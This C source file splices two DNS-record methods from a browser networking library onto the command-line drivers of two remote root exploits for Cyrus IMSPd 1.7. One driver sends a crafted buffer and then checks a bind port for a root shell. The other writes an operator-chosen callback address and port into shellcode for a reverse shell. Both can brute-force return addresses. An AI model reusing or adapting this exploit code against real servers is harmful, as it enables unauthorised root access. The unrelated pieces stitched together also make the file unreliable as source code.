// Fetches the next address of this DNS record and stores its textual form in
// |result|.
//
// Returns the failure code from GetNextAddr() unchanged when no address can
// be obtained, NS_ERROR_FAILURE when the address cannot be rendered as text,
// and NS_OK otherwise. |result| is only written on success.
NS_IMETHODIMP
nsDNSRecord::GetNextAddrAsString(nsACString &result)
{
    // First argument is 0 -- presumably the port, which is irrelevant for a
    // textual host address; confirm against GetNextAddr's declaration.
    PRNetAddr nextAddr;
    const nsresult status = GetNextAddr(0, &nextAddr);
    if (NS_FAILED(status)) {
        return status;
    }

    // The conversion is bounded by the buffer: PR_NetAddrToString receives
    // sizeof(text) and reports failure rather than writing past the end.
    char text[64];
    if (PR_NetAddrToString(&nextAddr, text, sizeof(text)) != PR_SUCCESS) {
        // conversion failed for some reason
        NS_ERROR("PR_NetAddrToString failed unexpectedly");
        return NS_ERROR_FAILURE;
    }

    result.Assign(text);
    return NS_OK;
}
// Reports through |*result| whether another address can still be read from
// this record, without consuming it. Always returns NS_OK.
//
// |result| is dereferenced unconditionally, so the caller must pass a valid
// pointer.
NS_IMETHODIMP
nsDNSRecord::HasMore(PRBool *result)
{
    // Iteration already finished: nothing left to probe.
    if (mDone) {
        *result = PR_FALSE;
        return NS_OK;
    }

    // NSPR offers no "is there another address?" query, so the only way to
    // find out is to fetch the next address and then undo the side effects.
    void *savedIter = mIter;
    PRNetAddr scratch;
    const nsresult probe = GetNextAddr(0, &scratch);
    *result = NS_SUCCEEDED(probe);

    // Roll the iteration state back to where it was before the probe. mDone
    // was false on entry (checked above), so it is reset to false as well.
    mIter = savedIter;
    mDone = PR_FALSE;
    return NS_OK;
}
// Command-line driver of a proof-of-concept for Cyrus IMSPd 1.7 (per the
// banner printed below). The payload builder (CreateEvilBuffer), the target
// table (Targets), the verification helper (VerifyXpl) and the constants
// DEFAULT_PORT, ROOT_PORT, DEFAULT_START_ADDRESS, TARGET and BRUTEFORCE are
// defined elsewhere and are not visible here.
//
// Options, as parsed below:
//   -h host    service host (required)
//   -p port    service port (defaults to DEFAULT_PORT)
//   -r port    port checked after the attempt (defaults to ROOT_PORT)
//   -t index   use the return address of Targets[index]
//   -b         iterate over candidate return addresses instead
//   -a 0xADDR  first address for -b (defaults to DEFAULT_START_ADDRESS)
// -t and -b are mutually exclusive; exactly one of them is required.
//
// Network-visible behaviour, as far as this function shows: one TCP
// connection to Host:Port carrying a single send() of the crafted buffer,
// followed after two one-second sleeps by a check against BindPort on the
// same host. With -b this repeats without an upper bound, one new connection
// per candidate address, pausing 120 seconds whenever the connect fails. A
// run of short-lived connections from one client to the service port, each
// followed by a probe of a second port, is what a detection rule can key on.
int main(int argc, char **argv)
{
    extern char *optarg;
    extern int optind;
    char opt;
    char *Host = NULL;
    int Port = DEFAULT_PORT;
    int Flags = 0;                      // 0 until -t or -b selects a mode
    int StartAddress = DEFAULT_START_ADDRESS;
    int TargetNumber = 0;
    int Sock,rootSock,i;
    char *EvilBuffer;
    int BindPort = ROOT_PORT;

    fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit bY SpikE ]==\n\n");

    // Process arguments. Every rejected value goes through Usage(), which
    // presumably prints the help text and exits (definition not shown).
    while ( (opt = getopt(argc,argv,"h:t:p:ba:r:")) != EOF)
    {
        switch(opt)
        {
            case 'r':
                BindPort = atoi(optarg);
                if(!BindPort) Usage(argv[0]);
                break;
            case 'h':
                Host = optarg;
                break;
            case 'p':
                Port = atoi(optarg);
                if(!Port) Usage(argv[0]);
                break;
            case 'b':
                // Only accepted when no mode has been chosen yet.
                if(Flags == 0) Flags = BRUTEFORCE;
                else Usage(argv[0]);
                break;
            case 'a':
                // The address must be written in hex with a 0x prefix.
                if( sscanf(optarg,"0x%lx",&StartAddress) != 1) Usage(argv[0]);
                break;
            case 't':
                TargetNumber = atoi(optarg);
                // Only accepted when no mode has been chosen yet.
                if(Flags == 0) Flags = TARGET;
                else Usage(argv[0]);
                break;
            default:
                Usage(argv[0]);
                break;
        }
    }

    // A host and one of the two modes are mandatory.
    if(Host == NULL || Flags == 0) Usage(argv[0]);

    // Verify target: walk Targets[] up to its terminator (Name == 0), step
    // back to the last real entry and reject an index beyond it.
    for(i=0;;i++) if(Targets[i].Name == 0) break;
    if(--i<TargetNumber) Usage(argv[0]);

    // Echo the effective settings before anything is sent.
    if(Flags == TARGET) fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
    fprintf(stdout,"*** Target host : %s\n",Host);
    fprintf(stdout,"*** Target port : %u\n",Port);
    fprintf(stdout,"*** Bind to port : %u\n",BindPort);
    if(Flags == TARGET) fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr);
    else fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress);

    switch(Flags)
    {
        case TARGET:
            // Single attempt with the return address taken from the table.
            Sock = ConectToHost(Host,Port);
            if(Sock == -1) fatal("Could not connect");
            else fprintf(stdout,"[+] Connected\n");
            fprintf(stdout,"[+] Creating evil buffer\n");
            EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr,BindPort);
            fprintf(stdout,"[+] Sending evil buffer\n");
            // Blocks until an integer has been read from stdin; the buffer is
            // not sent before that.
            scanf("%d",&i);
            send(Sock,EvilBuffer,strlen(EvilBuffer),0);
            sleep(1);
            fprintf(stdout,"[+] Verifying ...\n");
            sleep(1);
            // VerifyXpl() is not shown; a result >= 0 is treated as a socket
            // and handed to doHack().
            if( (rootSock = VerifyXpl(Host,BindPort)) >=0)
            {
                close(Sock);
                free(EvilBuffer);
                fprintf(stdout,"[+] Yeap.. It is a root shell\n\n");
                doHack(rootSock);
                close(rootSock);
                exit(0);
            }
            else fatal("No root shell. Maybe next time");
            break;
        default:
            // Brute-force mode: the loop has no exit condition of its own and
            // only ends through exit(0) after a successful verification.
            for(;;)
            {
                fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress);
                Sock = ConectToHost(Host,Port);
                if(Sock == -1)
                {
                    // Connect failed: keep the loop alive and retry the same
                    // address after a two-minute pause.
                    fprintf(stdout,"[+] Could not connect. Waiting...\n\n");
                    sleep(120);
                }
                else
                {
                    fprintf(stdout,"[+] Connected\n");
                    fprintf(stdout,"[+] Creating evil buffer\n");
                    EvilBuffer = CreateEvilBuffer(StartAddress,BindPort);
                    fprintf(stdout,"[+] Sending evil buffer\n");
                    send(Sock,EvilBuffer,strlen(EvilBuffer),0);
                    sleep(1);
                    fprintf(stdout,"[+] Verifying ...\n");
                    sleep(1);
                    if( (rootSock = VerifyXpl(Host,BindPort)) >=0)
                    {
                        // Verification succeeded: release this attempt's
                        // resources and hand the socket to doHack().
                        close(Sock);
                        free(EvilBuffer);
                        fprintf(stdout,"[+] Yeap.. It is a root shell\n\n");
                        doHack(rootSock);
                        close(rootSock);
                        exit(0);
                    }
                    // Attempt failed: clean up and move to the next candidate
                    // address (GetNextAddr is defined elsewhere).
                    close(Sock);
                    free(EvilBuffer);
                    fprintf(stdout,"\n");
                    StartAddress = GetNextAddr(StartAddress);
                }
            }
            break;
    }

    // Reached only from the TARGET branch, and only if fatal() returns
    // (definition not shown); the brute-force loop above never falls through.
    free(EvilBuffer);
    close(Sock);
}
// Command-line driver of a second proof-of-concept for Cyrus IMSPd 1.7 (per
// the banner printed below). Going by the labels it prints, this variant
// makes the payload connect back to an address and port supplied by the
// operator instead of checking a port on the service host. Shellcode,
// Targets, CreateEvilBuffer, GetNextAddr and the constants DEFAULT_PORT,
// DEFAULT_START_ADDRESS, TARGET and BRUTEFORCE are defined elsewhere and are
// not visible here.
//
// Options, as parsed below:
//   -h host     service host (required)
//   -p port     service port (defaults to DEFAULT_PORT)
//   -i a.b.c.d  connect-back address (required, no octet may be 0)
//   -r port     connect-back port (required)
//   -t index    use the return address of Targets[index]
//   -b          iterate over candidate return addresses instead
//   -a 0xADDR   first address for -b (defaults to DEFAULT_START_ADDRESS)
// -t and -b are mutually exclusive; exactly one of them is required.
//
// Network-visible behaviour, as far as this function shows: one TCP
// connection to Host:Port per attempt carrying a single send() of the crafted
// buffer, repeated about once per second with -b. Because the callback
// address and port are written into the payload, an outbound connection from
// the service host shortly after such a request is the matching signal, and
// egress filtering on that host is the matching control.
int main(int argc, char **argv)
{
    extern char *optarg;
    extern int optind;
    char opt;
    char *Host = NULL;
    int Port = DEFAULT_PORT;
    int Flags = 0;                      // 0 until -t or -b selects a mode
    int StartAddress = DEFAULT_START_ADDRESS;
    int TargetNumber = 0;
    int Sock,rootSock,i;
    char *EvilBuffer;
    int CBackPort = 0;
    char Addr[20];                      // holds StartAddress as text for the re-exec
    int IP0 = 0,IP1 = 0,IP2 = 0,IP3 = 0;
    char *IPPtr,*CBackPortPtr;          // original -i / -r strings, reused by execl()
    // Points at the 16-bit field at offset 39 of the Shellcode array.
    unsigned short *PortPtr = (unsigned short *)(Shellcode+39);

    fprintf(stdout,"\n==[ Cyrus IMSPd 1.7 Remote Root Exploit ]==\n\n");

    // Process arguments. Every rejected value goes through Usage(), which
    // presumably prints the help text and exits (definition not shown).
    while ( (opt = getopt(argc,argv,"h:t:p:ba:r:i:")) != EOF)
    {
        switch(opt)
        {
            case 'i':
                // Dotted quad; the first octet lands in IP3, the last in IP0.
                if( sscanf(optarg,"%d.%d.%d.%d" ,&IP3,&IP2,&IP1,&IP0) != 4) Usage(argv[0]);
                IPPtr = optarg;
                break;
            case 'r':
                CBackPort = atoi(optarg);
                if(!CBackPort) Usage(argv[0]);
                CBackPortPtr = optarg;
                break;
            case 'h':
                Host = optarg;
                break;
            case 'p':
                Port = atoi(optarg);
                if(!Port) Usage(argv[0]);
                break;
            case 'b':
                // Only accepted when no mode has been chosen yet.
                if(Flags == 0) Flags = BRUTEFORCE;
                else Usage(argv[0]);
                break;
            case 'a':
                // The address must be written in hex with a 0x prefix.
                if( sscanf(optarg,"0x%lx",&StartAddress) != 1) Usage(argv[0]);
                break;
            case 't':
                TargetNumber = atoi(optarg);
                // Only accepted when no mode has been chosen yet.
                if(Flags == 0) Flags = TARGET;
                else Usage(argv[0]);
                break;
            default:
                Usage(argv[0]);
                break;
        }
    }

    // Host, mode, callback port and callback address are all mandatory; an
    // address with any octet equal to 0 is rejected as well.
    if(Host == NULL || Flags == 0) Usage(argv[0]);
    if(CBackPort == 0) Usage(argv[0]);
    if(IP0 ==0 || IP1 == 0 || IP2 == 0 || IP3 == 0) Usage(argv[0]);

    // Verify target: walk Targets[] up to its terminator (Name == 0), step
    // back to the last real entry and reject an index beyond it.
    for(i=0;;i++) if(Targets[i].Name == 0) break;
    if(--i<TargetNumber) Usage(argv[0]);

    // Update shellcode: the four address octets go to bytes 33..36 and the
    // port, in network byte order, to the field PortPtr points at.
    Shellcode[33] = IP3;
    Shellcode[34] = IP2;
    Shellcode[35] = IP1;
    Shellcode[36] = IP0;
    *PortPtr = htons((unsigned short)CBackPort);

    // Echo the effective settings before anything is sent.
    if(Flags == TARGET) fprintf(stdout,"*** Target plataform : %s\n",Targets[TargetNumber].Name);
    fprintf(stdout,"*** Target host : %s\n",Host);
    fprintf(stdout,"*** Target port : %u\n",Port);
    fprintf(stdout,"*** IP to connect back : %u.%u.%u.%u\n" ,IP3,IP2,IP1,IP0);
    fprintf(stdout,"*** Port to connect back : %u\n",CBackPort);
    if(Flags == TARGET) fprintf(stdout,"*** Target RET : %#010x\n\n",Targets[TargetNumber].Retaddr);
    else fprintf(stdout,"*** Bruteforce mode start : %#010x\n\n",StartAddress);

    switch(Flags)
    {
        case TARGET:
            // Single attempt with the return address taken from the table.
            // No verification step here: the result is only observable on the
            // operator's own listener.
            Sock = ConectToHost(Host,Port);
            if(Sock == -1) fatal("Could not connect");
            else fprintf(stdout,"[+] Connected\n");
            fprintf(stdout,"[+] Creating evil buffer\n");
            EvilBuffer = CreateEvilBuffer(Targets[TargetNumber].Retaddr);
            fprintf(stdout,"[+] Sending evil buffer\n");
            send(Sock,EvilBuffer,strlen(EvilBuffer),0);
            sleep(1);
            fprintf(stdout,"[+] Wait for root shell on your netcat\n\n");
            break;
        default:
            // Brute-force mode: the loop has no exit condition; it runs until
            // the process is stopped or replaced by the execl() below.
            for(;;)
            {
                fprintf(stdout,"[+] Using RetAddr = %#010x\n",StartAddress);
                Sock = ConectToHost(Host,Port);
                if(Sock == -1)
                {
                    // Connect failed: instead of stopping, re-execute this
                    // program with the current address as the new -a value.
                    fprintf(stdout,"[-] Error. Restarting ...\n\n");
                    sleep(1);
                    sprintf(Addr,"%#010x",StartAddress);
                    execl(argv[0],argv[0],"-h",Host,"-b","-a",Addr,"-i",IPPtr,"-r",CBackPortPtr,0);
                }
                else
                {
                    fprintf(stdout,"[+] Connected\n");
                    fprintf(stdout,"[+] Creating evil buffer\n");
                    EvilBuffer = CreateEvilBuffer(StartAddress);
                    fprintf(stdout,"[+] Sending evil buffer\n");
                    send(Sock,EvilBuffer,strlen(EvilBuffer),0);
                    sleep(1);
                    // Clean up and move to the next candidate address
                    // (GetNextAddr is defined elsewhere).
                    close(Sock);
                    free(EvilBuffer);
                    fprintf(stdout,"\n");
                    StartAddress = GetNextAddr(StartAddress);
                }
            }
            break;
    }

    // Reached only from the TARGET branch; the brute-force loop above never
    // falls through.
    free(EvilBuffer);
    close(Sock);
}